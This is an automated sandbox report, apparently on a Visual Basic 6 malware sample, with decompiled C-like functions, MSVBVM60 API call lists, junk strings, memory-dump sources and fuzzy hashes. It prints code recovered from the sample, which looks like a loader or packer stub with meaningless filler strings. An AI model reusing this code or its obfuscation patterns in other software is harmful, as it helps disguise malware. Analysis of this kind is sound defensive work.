
Download Yara Rule

C-Code - Quality: 47%

			E00420577(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				char _v88;
				char* _v96;
				intOrPtr _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				short _v124;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				char* _t95;
				signed int _t99;
				char* _t103;
				signed int _t107;
				char* _t113;
				intOrPtr _t155;
				intOrPtr _t167;

				_t167 = __fp0;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t155;
				_push(0x7c);
				L00401350();
				_v12 = _t155;
				_v8 = 0x4012c8;
				_v96 = 0x403fe8;
				_v104 = 8;
				L004014BE();
				_push( &_v72);
				_push(0x58);
				_push( &_v88);
				L0040143A();
				_push( &_v88);
				L004014DC();
				L00401560();
				_push( &_v88);
				_push( &_v72);
				_push(2);
				L0040153C();
				if( *0x422010 != 0) {
					_v132 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v132 = 0x422010;
				}
				_t95 =  &_v52;
				L00401566();
				_v108 = _t95;
				_t99 =  *((intOrPtr*)( *_v108 + 0x158))(_v108,  &_v40, _t95,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x2fc))( *_v132));
				asm("fclex");
				_v112 = _t99;
				if(_v112 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x403c58);
					_push(_v108);
					_push(_v112);
					L00401572();
					_v136 = _t99;
				}
				if( *0x422010 != 0) {
					_v140 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v140 = 0x422010;
				}
				_t103 =  &_v56;
				L00401566();
				_v116 = _t103;
				_t107 =  *((intOrPtr*)( *_v116 + 0xe8))(_v116,  &_v44, _t103,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x2fc))( *_v140));
				asm("fclex");
				_v120 = _t107;
				if(_v120 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x403c58);
					_push(_v116);
					_push(_v120);
					L00401572();
					_v144 = _t107;
				}
				_push(_v40);
				L00401530();
				L00401560();
				_push(_t107);
				_push(_v44);
				L0040144C();
				_v124 =  ~(0 | _t107 <= 0x00000000);
				_push( &_v44);
				_push( &_v48);
				_push( &_v40);
				_push(3);
				L0040151E();
				_push( &_v56);
				_push( &_v52);
				_push(2);
				L00401512();
				_t113 = _v124;
				if(_t113 != 0) {
					_v96 = L"anoperineal";
					_v104 = 8;
					L004014BE();
					_push( &_v72);
					_push( &_v88);
					L00401434();
					_push( &_v88);
					L004014DC();
					L00401560();
					_push( &_v88);
					_push( &_v72);
					_push(2);
					L0040153C();
					_v96 = L"Subreptitiously";
					_v104 = 8;
					L004014BE();
					_push( &_v72);
					_push( &_v88);
					L0040142E();
					_push( &_v88);
					L004014DC();
					L00401560();
					_push( &_v88);
					_t113 =  &_v72;
					_push(_t113);
					_push(2);
					L0040153C();
				}
				L00401428();
				_v32 = _t167;
				asm("wait");
				_push(0x420865);
				L00401554();
				L00401554();
				L00401554();
				return _t113;
			}

0x00420577
0x0042057c
0x00420587
0x00420588
0x0042058f
0x00420592
0x0042059a
0x0042059d
0x004205a4
0x004205ab
0x004205b8
0x004205c0
0x004205c1
0x004205c6
0x004205c7
0x004205cf
0x004205d0
0x004205da
0x004205e2
0x004205e6
0x004205e7
0x004205e9
0x004205f8
0x00420612
0x004205fa
0x004205fa
0x004205ff
0x00420604
0x00420609
0x00420609
0x0042062d
0x00420631
0x00420636
0x00420645
0x0042064b
0x0042064d
0x00420654
0x00420673
0x00420656
0x00420656
0x0042065b
0x00420660
0x00420663
0x00420666
0x0042066b
0x0042066b
0x00420681
0x0042069e
0x00420683
0x00420683
0x00420688
0x0042068d
0x00420692
0x00420692
0x004206c2
0x004206c6
0x004206cb
0x004206da
0x004206e0
0x004206e2
0x004206e9
0x00420708
0x004206eb
0x004206eb
0x004206f0
0x004206f5
0x004206f8
0x004206fb
0x00420700
0x00420700
0x0042070f
0x00420712
0x0042071c
0x00420721
0x00420722
0x00420725
0x00420733
0x0042073a
0x0042073e
0x00420742
0x00420743
0x00420745
0x00420750
0x00420754
0x00420755
0x00420757
0x0042075f
0x00420765
0x0042076b
0x00420772
0x0042077f
0x00420787
0x0042078b
0x0042078c
0x00420794
0x00420795
0x0042079f
0x004207a7
0x004207ab
0x004207ac
0x004207ae
0x004207b6
0x004207bd
0x004207ca
0x004207d2
0x004207d6
0x004207d7
0x004207df
0x004207e0
0x004207ea
0x004207f2
0x004207f3
0x004207f6
0x004207f7
0x004207f9
0x004207fe
0x00420801
0x00420806
0x00420809
0x0042080a
0x0042084f
0x00420857
0x0042085f
0x00420864

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 00420592
__vbaVarDup.MSVBVM60 ref: 004205B8
#607.MSVBVM60(?,00000058,?), ref: 004205C7
__vbaStrVarMove.MSVBVM60(?,?,00000058,?), ref: 004205D0
__vbaStrMove.MSVBVM60(?,?,00000058,?), ref: 004205DA
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,00000058,?), ref: 004205E9
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 00420604
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420631
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000158), ref: 00420666
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0042068D
__vbaObjSet.MSVBVM60(?,00000000), ref: 004206C6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000000E8), ref: 004206FB
#517.MSVBVM60(?), ref: 00420712
__vbaStrMove.MSVBVM60(?), ref: 0042071C
__vbaStrCmp.MSVBVM60(?,00000000,?), ref: 00420725
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000,?), ref: 00420745
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00420757
__vbaVarDup.MSVBVM60 ref: 0042077F
#522.MSVBVM60(?,?), ref: 0042078C
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 00420795
__vbaStrMove.MSVBVM60(?,?,?), ref: 0042079F
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 004207AE
__vbaVarDup.MSVBVM60 ref: 004207CA
#520.MSVBVM60(?,?), ref: 004207D7
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 004207E0
__vbaStrMove.MSVBVM60(?,?,?), ref: 004207EA
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 004207F9
#535.MSVBVM60 ref: 00420801
__vbaFreeStr.MSVBVM60(00420865), ref: 0042084F
__vbaFreeStr.MSVBVM60(00420865), ref: 00420857
__vbaFreeStr.MSVBVM60(00420865), ref: 0042085F

Strings

Subreptitiously, xrefs: 004207B6
anoperineal, xrefs: 0042076B

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresultNew2$#517#520#522#535#607Chkstk
String ID: Subreptitiously$anoperineal
API String ID: 3004089779-3635317160
Opcode ID: 97958321a8f2699713898ef74680d0447c056762d9a5d6d8b7ca011419df4932
Instruction ID: 5dd6e86a6062abb4d4aa9281280e0e05c877630a4d48308efc72614433a45981
Opcode Fuzzy Hash: 97958321a8f2699713898ef74680d0447c056762d9a5d6d8b7ca011419df4932
Instruction Fuzzy Hash: A681EC71D00218AFDB00EFE1DD46EDDB7B8AB44304F60446AE106BB1A1EB786A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC72, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0041EC72(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				char _v40;
				short _v48;
				char _v56;
				char _v72;
				char* _v96;
				intOrPtr _v104;
				char* _v112;
				char _v120;
				void* _v124;
				intOrPtr* _v128;
				signed int _v132;
				short _v136;
				intOrPtr* _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				char* _t78;
				signed int _t82;
				short _t87;
				char* _t90;
				char* _t94;
				signed int _t98;
				char* _t99;
				intOrPtr _t131;

				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t131;
				L00401350();
				_v12 = _t131;
				_v8 = 0x401248;
				if( *0x422010 != 0) {
					_v144 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v144 = 0x422010;
				}
				_t78 =  &_v36;
				L00401566();
				_v128 = _t78;
				_t82 =  *((intOrPtr*)( *_v128 + 0x168))(_v128,  &_v124, _t78,  *((intOrPtr*)( *((intOrPtr*)( *_v144)) + 0x300))( *_v144));
				asm("fclex");
				_v132 = _t82;
				if(_v132 >= 0) {
					_v148 = _v148 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x403c58);
					_push(_v128);
					_push(_v132);
					L00401572();
					_v148 = _t82;
				}
				_v48 = _v124;
				_v56 = 2;
				_push( &_v56);
				_push( &_v72);
				L004014CA();
				_v112 = L"Apollo";
				_v120 = 0x8008;
				_push( &_v72);
				_t87 =  &_v120;
				_push(_t87);
				L0040158A();
				_v136 = _t87;
				L0040156C();
				_push( &_v72);
				_push( &_v56);
				_push(2);
				L0040153C();
				_t90 = _v136;
				if(_t90 != 0) {
					if( *0x422010 != 0) {
						_v152 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x40324c);
						L00401578();
						_v152 = 0x422010;
					}
					_t94 =  &_v36;
					L00401566();
					_v128 = _t94;
					_t98 =  *((intOrPtr*)( *_v128 + 0x1b8))(_v128,  &_v40, _t94,  *((intOrPtr*)( *((intOrPtr*)( *_v152)) + 0x300))( *_v152));
					asm("fclex");
					_v132 = _t98;
					if(_v132 >= 0) {
						_v156 = _v156 & 0x00000000;
					} else {
						_push(0x1b8);
						_push(0x403c58);
						_push(_v128);
						_push(_v132);
						L00401572();
						_v156 = _t98;
					}
					_push(0);
					_push(0);
					_push(_v40);
					_t99 =  &_v56;
					_push(_t99);
					L00401500();
					_push(_t99);
					L004014DC();
					L00401560();
					_push(_t99);
					L00401530();
					L00401560();
					L00401554();
					_push( &_v40);
					_push( &_v36);
					_push(2);
					L00401512();
					L0040157E();
					_v96 = L"fraena";
					_v104 = 8;
					L004014BE();
					_push( &_v56);
					_push( &_v72);
					L004014C4();
					_push( &_v72);
					L004014DC();
					L00401560();
					_push( &_v72);
					_t90 =  &_v56;
					_push(_t90);
					_push(2);
					L0040153C();
				}
				_push(0x41ef1b);
				L00401554();
				L00401554();
				return _t90;
			}

0x0041ec77
0x0041ec82
0x0041ec83
0x0041ec8f
0x0041ec97
0x0041ec9a
0x0041eca8
0x0041ecc5
0x0041ecaa
0x0041ecaa
0x0041ecaf
0x0041ecb4
0x0041ecb9
0x0041ecb9
0x0041ece9
0x0041eced
0x0041ecf2
0x0041ed01
0x0041ed07
0x0041ed09
0x0041ed10
0x0041ed2f
0x0041ed12
0x0041ed12
0x0041ed17
0x0041ed1c
0x0041ed1f
0x0041ed22
0x0041ed27
0x0041ed27
0x0041ed3a
0x0041ed3e
0x0041ed48
0x0041ed4c
0x0041ed4d
0x0041ed52
0x0041ed59
0x0041ed63
0x0041ed64
0x0041ed67
0x0041ed68
0x0041ed6d
0x0041ed77
0x0041ed7f
0x0041ed83
0x0041ed84
0x0041ed86
0x0041ed8e
0x0041ed97
0x0041eda4
0x0041edc1
0x0041eda6
0x0041eda6
0x0041edab
0x0041edb0
0x0041edb5
0x0041edb5
0x0041ede5
0x0041ede9
0x0041edee
0x0041edfd
0x0041ee03
0x0041ee05
0x0041ee0c
0x0041ee2b
0x0041ee0e
0x0041ee0e
0x0041ee13
0x0041ee18
0x0041ee1b
0x0041ee1e
0x0041ee23
0x0041ee23
0x0041ee32
0x0041ee34
0x0041ee36
0x0041ee39
0x0041ee3c
0x0041ee3d
0x0041ee45
0x0041ee46
0x0041ee50
0x0041ee55
0x0041ee56
0x0041ee60
0x0041ee68
0x0041ee70
0x0041ee74
0x0041ee75
0x0041ee77
0x0041ee82
0x0041ee87
0x0041ee8e
0x0041ee9b
0x0041eea3
0x0041eea7
0x0041eea8
0x0041eeb0
0x0041eeb1
0x0041eebb
0x0041eec3
0x0041eec4
0x0041eec7
0x0041eec8
0x0041eeca
0x0041eecf
0x0041eed2
0x0041ef0d
0x0041ef15
0x0041ef1a

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041EC8F
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,00401356), ref: 0041ECB4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041ECED
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000168), ref: 0041ED22
#652.MSVBVM60(?,00000002), ref: 0041ED4D
__vbaVarTstEq.MSVBVM60(00008008,?,?,00000002), ref: 0041ED68
__vbaFreeObj.MSVBVM60(00008008,?,?,00000002), ref: 0041ED77
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?,?,00000002), ref: 0041ED86
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 0041EDB0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041EDE9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000001B8), ref: 0041EE1E
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0041EE3D
__vbaStrVarMove.MSVBVM60(00000000), ref: 0041EE46
__vbaStrMove.MSVBVM60(00000000), ref: 0041EE50
#517.MSVBVM60(00000000,00000000), ref: 0041EE56
__vbaStrMove.MSVBVM60(00000000,00000000), ref: 0041EE60
__vbaFreeStr.MSVBVM60(00000000,00000000), ref: 0041EE68
__vbaFreeObjList.MSVBVM60(00000002,00000000,00000000,00000000,00000000), ref: 0041EE77
__vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 0041EE82
__vbaVarDup.MSVBVM60 ref: 0041EE9B
#528.MSVBVM60(?,?), ref: 0041EEA8
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041EEB1
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041EEBB
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041EECA
__vbaFreeStr.MSVBVM60(0041EF1B), ref: 0041EF0D
__vbaFreeStr.MSVBVM60(0041EF1B), ref: 0041EF15

Strings

fraena, xrefs: 0041EE87
Apollo, xrefs: 0041ED52

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresultNew2$#517#528#652CallChkstkLate
String ID: Apollo$fraena
API String ID: 1415655392-2588804562
Opcode ID: 857a7c8516d1ac53c8fff08fa69a00709731bc6c78dbb23150a8203049674030
Instruction ID: dbaf7461c33197ddfdfc726c8501a9c5380575b40069402b9156c2fe22537586
Opcode Fuzzy Hash: 857a7c8516d1ac53c8fff08fa69a00709731bc6c78dbb23150a8203049674030
Instruction Fuzzy Hash: 3E710A75D00218ABDB10EFA1DD46FDDB7B8BF08704F20416AE506B71A1EB785A45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041FC8A, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041FC8A(void* __ebx, void* __edi, void* __esi, signed int* _a24) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v52;
				char _v60;
				char _v76;
				char* _v100;
				intOrPtr _v108;
				intOrPtr _v116;
				char _v124;
				char _v128;
				intOrPtr* _v132;
				signed int _v136;
				void* _v140;
				signed int _v144;
				intOrPtr _v156;
				intOrPtr* _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				signed int _v176;
				char* _t90;
				signed int _t94;
				short _t98;
				signed int _t101;
				signed int _t112;
				signed int _t117;
				void* _t138;
				intOrPtr _t139;

				_t139 = _t138 - 0xc;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t139;
				L00401350();
				_v16 = _t139;
				_v12 = 0x4012a8;
				 *_a24 =  *_a24 & 0x00000000;
				if( *0x422010 != 0) {
					_v160 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v160 = 0x422010;
				}
				_t90 =  &_v44;
				L00401566();
				_v132 = _t90;
				_t94 =  *((intOrPtr*)( *_v132 + 0x70))(_v132,  &_v128, _t90,  *((intOrPtr*)( *((intOrPtr*)( *_v160)) + 0x30c))( *_v160));
				asm("fclex");
				_v136 = _t94;
				if(_v136 >= 0) {
					_v164 = _v164 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x403cc4);
					_push(_v132);
					_push(_v136);
					L00401572();
					_v164 = _t94;
				}
				_v52 = _v128;
				_v60 = 4;
				_push(0);
				_push( &_v60);
				_push( &_v76);
				L00401464();
				_v116 = 0x301dae;
				_v124 = 0x8003;
				_push( &_v76);
				_t98 =  &_v124;
				_push(_t98);
				L0040146A();
				_v140 = _t98;
				L0040156C();
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L0040153C();
				_t101 = _v140;
				if(_t101 != 0) {
					_v100 = L"Frigrelsesmidlerne5";
					_v108 = 8;
					L004014BE();
					_push( &_v60);
					_push( &_v76);
					L0040145E();
					_push( &_v76);
					L004014DC();
					L00401560();
					_push( &_v76);
					_push( &_v60);
					_push(2);
					L0040153C();
					if( *0x4223fc != 0) {
						_v168 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c38);
						L00401578();
						_v168 = 0x4223fc;
					}
					_v132 =  *_v168;
					_t112 =  *((intOrPtr*)( *_v132 + 0x14))(_v132,  &_v44);
					asm("fclex");
					_v136 = _t112;
					if(_v136 >= 0) {
						_v172 = _v172 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c28);
						_push(_v132);
						_push(_v136);
						L00401572();
						_v172 = _t112;
					}
					_v140 = _v44;
					_t117 =  *((intOrPtr*)( *_v140 + 0x60))(_v140,  &_v40);
					asm("fclex");
					_v144 = _t117;
					if(_v144 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x403c48);
						_push(_v140);
						_push(_v144);
						L00401572();
						_v176 = _t117;
					}
					_t101 = _v40;
					_v156 = _t101;
					_v40 = _v40 & 0x00000000;
					L00401560();
					L0040156C();
				}
				L004014E2();
				asm("wait");
				_push(0x41ff5f);
				L00401554();
				L00401554();
				return _t101;
			}

0x0041fc8d
0x0041fc90
0x0041fc9b
0x0041fc9c
0x0041fca8
0x0041fcb0
0x0041fcb3
0x0041fcbd
0x0041fcc7
0x0041fce4
0x0041fcc9
0x0041fcc9
0x0041fcce
0x0041fcd3
0x0041fcd8
0x0041fcd8
0x0041fd08
0x0041fd0c
0x0041fd11
0x0041fd20
0x0041fd23
0x0041fd25
0x0041fd32
0x0041fd51
0x0041fd34
0x0041fd34
0x0041fd36
0x0041fd3b
0x0041fd3e
0x0041fd44
0x0041fd49
0x0041fd49
0x0041fd5b
0x0041fd5e
0x0041fd65
0x0041fd6a
0x0041fd6e
0x0041fd6f
0x0041fd74
0x0041fd7b
0x0041fd85
0x0041fd86
0x0041fd89
0x0041fd8a
0x0041fd8f
0x0041fd99
0x0041fda1
0x0041fda5
0x0041fda6
0x0041fda8
0x0041fdb0
0x0041fdb9
0x0041fdbf
0x0041fdc6
0x0041fdd3
0x0041fddb
0x0041fddf
0x0041fde0
0x0041fde8
0x0041fde9
0x0041fdf3
0x0041fdfb
0x0041fdff
0x0041fe00
0x0041fe02
0x0041fe11
0x0041fe2e
0x0041fe13
0x0041fe13
0x0041fe18
0x0041fe1d
0x0041fe22
0x0041fe22
0x0041fe40
0x0041fe4f
0x0041fe52
0x0041fe54
0x0041fe61
0x0041fe80
0x0041fe63
0x0041fe63
0x0041fe65
0x0041fe6a
0x0041fe6d
0x0041fe73
0x0041fe78
0x0041fe78
0x0041fe8a
0x0041fea2
0x0041fea5
0x0041fea7
0x0041feb4
0x0041fed6
0x0041feb6
0x0041feb6
0x0041feb8
0x0041febd
0x0041fec3
0x0041fec9
0x0041fece
0x0041fece
0x0041fedd
0x0041fee0
0x0041fee6
0x0041fef3
0x0041fefb
0x0041fefb
0x0041ff08
0x0041ff0d
0x0041ff0e
0x0041ff51
0x0041ff59
0x0041ff5e

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041FCA8
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,00401356), ref: 0041FCD3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FD0C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000070), ref: 0041FD44
#714.MSVBVM60(?,00000004,00000000), ref: 0041FD6F
__vbaVarTstGt.MSVBVM60(00008003,?,?,00000004,00000000), ref: 0041FD8A
__vbaFreeObj.MSVBVM60(00008003,?,?,00000004,00000000), ref: 0041FD99
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,00008003,?,?,00000004,00000000), ref: 0041FDA8
__vbaVarDup.MSVBVM60 ref: 0041FDD3
#518.MSVBVM60(?,?), ref: 0041FDE0
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041FDE9
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041FDF3
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041FE02
__vbaNew2.MSVBVM60(00403C38,004223FC,?,?,?,?,?,00401356), ref: 0041FE1D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C28,00000014), ref: 0041FE73
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C48,00000060), ref: 0041FEC9
__vbaStrMove.MSVBVM60(00000000,?,00403C48,00000060), ref: 0041FEF3
__vbaFreeObj.MSVBVM60(00000000,?,00403C48,00000060), ref: 0041FEFB
__vbaStrCopy.MSVBVM60(?,?,00401356), ref: 0041FF08
__vbaFreeStr.MSVBVM60(0041FF5F,?,?,00401356), ref: 0041FF51
__vbaFreeStr.MSVBVM60(0041FF5F,?,?,00401356), ref: 0041FF59

Strings

SVIRREFLUERS, xrefs: 0041FF00
Frigrelsesmidlerne5, xrefs: 0041FDBF

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$ListNew2$#518#714ChkstkCopy
String ID: Frigrelsesmidlerne5$SVIRREFLUERS
API String ID: 33727100-1709780716
Opcode ID: 0826b6692f79ac8c908fb2e178248dcf57d56e93280d5c2d76a65abcc9e7058b
Instruction ID: cf9d50c2c1a7003c7ffd204e75c3d1febacec28669ef9a5e0c4c5726bb4ed233
Opcode Fuzzy Hash: 0826b6692f79ac8c908fb2e178248dcf57d56e93280d5c2d76a65abcc9e7058b
Instruction Fuzzy Hash: 6071E871D00218AFDB10EFA5CC85BDDBBB8BF08704F5040AAE146B71A1DB785A89DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00420878, Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00420878(void* __ebx, void* __edi, void* __esi, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v40;
				void* _v44;
				char* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v76;
				char _v92;
				intOrPtr _v116;
				char _v124;
				short _v128;
				short _t49;
				char* _t52;
				void* _t70;
				intOrPtr _t71;

				_t71 = _t70 - 0x18;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t71;
				_push(0x70);
				L00401350();
				_v28 = _t71;
				_v24 = 0x4012d8;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				L004014E2();
				_v8 = 2;
				_v68 = 0x93c9f3d0;
				_v64 = 0x5b05;
				_v76 = 6;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v76);
				L00401422();
				L00401560();
				L0040157E();
				_v8 = 3;
				_push( &_v76);
				L00401476();
				_push( &_v76);
				_push( &_v92);
				L0040141C();
				_v116 = 0x6747;
				_v124 = 0x8002;
				_push( &_v92);
				_t49 =  &_v124;
				_push(_t49);
				L0040158A();
				_v128 = _t49;
				_push( &_v92);
				_push( &_v76);
				_push(2);
				L0040153C();
				_t52 = _v128;
				if(_t52 != 0) {
					_v8 = 4;
					_push(0xffffffff);
					L004014E8();
					_v8 = 5;
					_push(L"trinovantes");
					L00401416();
					_v48 = _t52;
					_v8 = 6;
					_push(0xf6);
					_push( &_v76);
					L00401410();
					_t52 =  &_v76;
					_push(_t52);
					L004014DC();
					L00401560();
					L0040157E();
				}
				_v8 = 8;
				L004013E6();
				_v60 = _t52;
				_v8 = 9;
				_v40 = 0x5d91;
				_push(0x420a00);
				L00401554();
				L00401554();
				L00401554();
				return _t52;
			}

0x0042087b
0x0042087e
0x00420889
0x0042088a
0x00420891
0x00420894
0x0042089c
0x0042089f
0x004208a6
0x004208ad
0x004208b4
0x004208c1
0x004208c6
0x004208cd
0x004208d4
0x004208db
0x004208e2
0x004208e4
0x004208e6
0x004208e8
0x004208ed
0x004208ee
0x004208f8
0x00420900
0x00420905
0x0042090f
0x00420910
0x00420918
0x0042091c
0x0042091d
0x00420922
0x00420929
0x00420933
0x00420934
0x00420937
0x00420938
0x0042093d
0x00420944
0x00420948
0x00420949
0x0042094b
0x00420953
0x00420959
0x0042095b
0x00420962
0x00420964
0x00420969
0x00420970
0x00420975
0x0042097a
0x0042097d
0x00420984
0x0042098c
0x0042098d
0x00420992
0x00420995
0x00420996
0x004209a0
0x004209a8
0x004209a8
0x004209ad
0x004209b4
0x004209b9
0x004209bc
0x004209c3
0x004209c9
0x004209ea
0x004209f2
0x004209fa
0x004209ff

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 00420894
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 004208C1
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 004208EE
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 004208F8
__vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420900
#610.MSVBVM60(00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420910
#553.MSVBVM60(?,00000006,00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0042091D
__vbaVarTstEq.MSVBVM60(00008002,?,?,?,?,?,?,00000006,00000006,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00420938
__vbaFreeVarList.MSVBVM60(00000002,00000006,?,00008002,?,?,?,?,?,?,00000006,00000006,00000006,000000FF,000000FE,000000FE), ref: 0042094B
__vbaOnError.MSVBVM60(000000FF,?,?,00401356), ref: 00420964
#578.MSVBVM60(trinovantes,000000FF,?,?,00401356), ref: 00420975
#526.MSVBVM60(?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 0042098D
__vbaStrVarMove.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 00420996
__vbaStrMove.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 004209A0
__vbaFreeVar.MSVBVM60(?,?,000000F6,trinovantes,000000FF,?,?,00401356), ref: 004209A8
#615.MSVBVM60(?,?,00401356), ref: 004209B4
__vbaFreeStr.MSVBVM60(00420A00), ref: 004209EA
__vbaFreeStr.MSVBVM60(00420A00), ref: 004209F2
__vbaFreeStr.MSVBVM60(00420A00), ref: 004209FA

Strings

Gg, xrefs: 00420922
trinovantes, xrefs: 00420970

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#526#553#578#610#615#703ChkstkCopyErrorList
String ID: Gg$trinovantes
API String ID: 2274906189-1238276640
Opcode ID: 4637df02a9ecdefcb39566079bef3a9458e23bb5b3625cc306c39f0933ddcf8f
Instruction ID: 8beaac2555608efb08e2e927c71e5fb8afbbef4fb63ac50b950ee5826975be1f
